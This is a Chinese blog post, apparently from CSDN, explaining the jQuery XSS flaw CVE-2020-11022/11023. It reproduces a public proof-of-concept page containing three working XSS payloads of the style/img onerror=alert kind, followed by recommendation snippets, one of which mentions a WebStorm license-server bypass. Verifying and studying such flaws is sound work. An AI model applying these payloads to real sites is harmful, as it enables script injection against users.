jQuery导致的XSS跨站漏洞

最新推荐文章于 2024-08-21 08:04:09 发布
最新推荐文章于 2024-08-21 08:04:09 发布
阅读量5.3k 收藏 6
点赞数 1
文章标签: xss 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45908624/article/details/127899504
版权

漏洞详情:

在JQuery的诸多发行版本中,存在着DOM-based XSS(跨站脚本攻击的一种)漏洞,易被攻击者利用。漏洞原因在于过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 location.hash 跨站漏洞。

漏洞发现:

最简单方式,通过火狐浏览器的retire.js插件,访问目标网站发现。

或者通过扫描器,找到JQuery版本信息

漏洞验证:

漏洞发现者提供了JavaScript XSS Demo POC,使用POC验证漏洞情况

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
    <script src="http://xxxxxxxxxxxxxx/js/common/jquery-2.1.3.min.js"></script>
</head>
<body>
<script>
function test(n,jq){
    sanitizedHTML = document.getElementById('poc'+n).innerHTML;
    if(jq){
        $('#div').html(sanitizedHTML);
    }else{
        div.innerHTML=sanitizedHTML;
    }
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>

<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x onerror=alert(2)> 
</xmp>

<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert("1st")>">
</xmp>

<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert("1st")></style>
</xmp>

<div id="div"></div>
</body>
</html>

点击POC1下的Append via .html,xss弹窗

F12查看源代码发现div下<style>标签被闭合,执行<img>中onerror的弹窗

其他就不做演示,可自行查看。

 

 

LZ_KaiHuang
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞笔记】jQuery跨站脚本
TeamsSix 的 CSDN 空间
11-20 2051
0x00 概述 漏洞名称:jQuery跨站脚本 风险等级:低危 问题类型:使用已知漏洞的组件 0x01 漏洞描述 关于jQueryjQuery是美国程序员John Resig所研发的一套开源、跨浏览器的JavaScript库。该库简化了HTML与JavaScript之间的操作,并具有模块化、插件扩展等特点。 漏洞原理:jQuery中过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 locat...
Jquery XSS漏洞(CVE-2020-11022)
热门推荐
jammny
02-04 2万+
漏洞详情 jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。 jQuery 大于或等于1.2至3.5.0的版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。即使执行sanitize处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),攻击者可利用该漏洞执行客户端代码。 漏洞影响 V 1.2.0 <= jquery < V 3.5.0 漏洞分析 在html()方
JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现】
一纸荒芜的博客
10-31 1万+
jquery-xss漏洞复现
安全扫描五项简介_cve-2015-9251,头条面试题
Innocence_0的博客
06-14 553
!!!!!
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。
Web安全-JQuery框架XSS漏洞浅析
道阻且长,行则将至。
01-23 1万+
文章目录框架简介漏洞简述漏洞检测漏洞复现漏洞分析漏洞复现修复建议新版漏洞漏洞复现漏洞原理修复方案漏洞验证 框架简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。 据一项调查报告,在对 433000 个网站的分析中发现,77%的网站至少使用了一个具
2024年最全webstorm的安装及基本配置,2024最新物联网嵌入式开发高频精选面试题分享
2401_85015025的博客
05-14 466
择“License server”,然后在输入框中输入 License server address 为:http://hb5.s.osidea.cc:1017(有可能不能用,自己可以百度搜一下最新的)点击”Activate”按钮。人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人**各种配置 可以根据自己的需求自行配置。7、开始基本配置 主要在。
jQuery XSS漏洞学习
weixin_43459870的博客
01-03 1万+
jQuery基础信息 jQuery简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 jQuery是一个JavaScript UI框架,它为许多DOM...
XSS跨站漏洞修复
带着梦想飞翔
07-08 953
避免XSS跨站漏洞的方法之一主要是将用户所提交的内容输入输出进行过滤,包括请求路径过滤与参数过滤。这里,我写一个过滤器专门处理XSS跨站漏洞,思路是将带有非法字符的请求转发到一个指定页面,将参数的非法字符过滤去除。 过滤器代码如下: [code="java"] package com.eshore.itmp.model.web.security; import java.io.IO...
jQuery Mobile漏洞会有跨站脚本攻击风险
12-11
然而,谷歌的安全工程师Eduardo Vela在jQuery Mobile中发现了一个安全隐患,可能导致跨站脚本(XSS)攻击。这种攻击允许恶意用户在受害者的浏览器中执行代码,从而可能窃取用户数据、操纵页面内容或执行其他恶意操作...
跨站脚本漏洞(XSS)示例
04-15
例如,"测试Web应用程序是否存在跨站脚本漏洞(XSS).doc"可能就是一个文档,里面详细介绍了如何进行XSS漏洞扫描和测试步骤。通常,这包括对输入字段进行各种注入尝试,检查是否能成功触发恶意脚本的执行。 防止XSS...
Jquery XSS.zip
08-24
标题中的“Jquery XSS.zip”表明这是一个关于jQuery跨站脚本(XSS漏洞相关的压缩包文件。在Web开发中,jQuery是一个广泛使用的JavaScript库,它简化了HTML文档遍历、事件处理、动画和Ajax交互。而XSS,全称Cross...
jQuery使用中可能被XSS攻击的一些危险环节提醒
10-22
XSS攻击,全称跨站脚本攻击(Cross-Site Scripting),是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本。由于jQuery是广泛使用的JavaScript库,它的某些方法在处理用户输入时如果没有妥善处理...
Jquery_html.rar
11-11
标题 "Jquery_html.rar" 暗示了这个压缩包包含了一个关于 jQuery 和 HTML 的示例,用于探讨和验证 jQuery 库在特定安全场景下的行为,即反射型跨站脚本(XSS)攻击的防护。反射型 XSS 是一种常见的 web 应用程序安全...
JQuery跨站脚本漏洞
qq274575499的博客
04-02 2126
jQuery 3.4.0之前版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
jQuery漏洞复现整理
网安君的博客
02-23 1万+
平时Acunetix会扫出来很多 Vulnerable JavaScript libraries中危漏洞,JavaScript一般存在的都是XSS漏洞,那么如何去在报告中体现出这个漏洞呢,具体内容如下文。 JavaScript XSS Demo <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta name="viewport" content="wid
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
1stPeak's Blog
03-25 2万+
jQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)
jQuery最新xss漏洞浅析、复现、修复
qq_29365787的博客
06-08 1万+
jQuery最新xss漏洞浅析、复现、修复 1、xss漏洞的形成和危害 形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是 应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。 在以下情况下会发生跨站点脚本编制 (XSS) 脆弱性: [1] 不可信数据进入 Web 应用程序,通常来自 Web 请求。 [2] Web 应用程序动态生成了包含此不可信数据的 Web 页面。 [3] 页面生成期间,应用程序不会禁止数据包含可由 Web 浏览器执
ok,boomer xss的dom破坏
最新发布
xiaomi11133的博客
08-21 355
通过构造与setTimeout函数参数名相同的标签id,浏览器执行setTimeout函数时会查找HTML中id=ok的字符串类型的标签,而标签被调用时回一个表示标签的字符串即href属性中的值,因此setTimeout函数执行时会将标签中href属性的值tel:alert(1)当作代码来执行,利用该框架中白名单函数tel来执行。在HTML中,如果使用一些特定的属性名(id、name)给DOM元素命名,这些属性会在全局作用域中创建同名的全局变量,指向对应的DOM元素。
怎么用jquery发现因为jquery版本过低引发的XSS跨站安全漏洞
06-08
jQuery中,由于早期版本的安全措施可能不完善,可能会存在一些历史漏洞,比如XSS跨站脚本攻击)风险。XSS漏洞通常是通过恶意注入脚本来获取用户的敏感信息或执行非授权操作。如果你怀疑遇到了由旧版本jQuery引起的XSS漏洞,可以按照以下步骤进行检查和修复: 1. **确定问题版本**:查看你的jQuery库版本,如果使用的是1.x或2.x版本,它们可能存在较高的XSS风险。推荐使用最新版本的jQuery(目前是3.x或更高),因为新版本通常会修复这些问题。 2. **检查代码中的DOM操作**:审查代码中涉及HTML插入、替换或修改的部分,特别是使用`html()`、`text()`或`append()`等方法时,确保没有直接拼接用户输入,而应该使用`.html()`的第二个参数并传递HTML编码过的字符串。 3. **使用`$.parseHTML()`或`$.ajax()`设置正确选项**:在某些情况下,使用`$.parseHTML()`来解析HTML字符串,并确保其安全。对于AJAX请求,设置`contentType`为`application/json`或`text/plain`,避免默认的`text/html`可能导致的注入。 4. **使用`.load()`代替`html()`**:如果使用了`.load()`方法,确保目标URL经过验证,不会接受来自不可信源的数据。 5. **使用jQuery安全插件**:虽然不是必须,但考虑使用像jQuery Sanitize或jQuery AJAX Security插件,它们可以帮助防止XSS漏洞。 6. **更新依赖**:如果有条件,尽量升级jQuery库到最新版本,这样可以确保安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值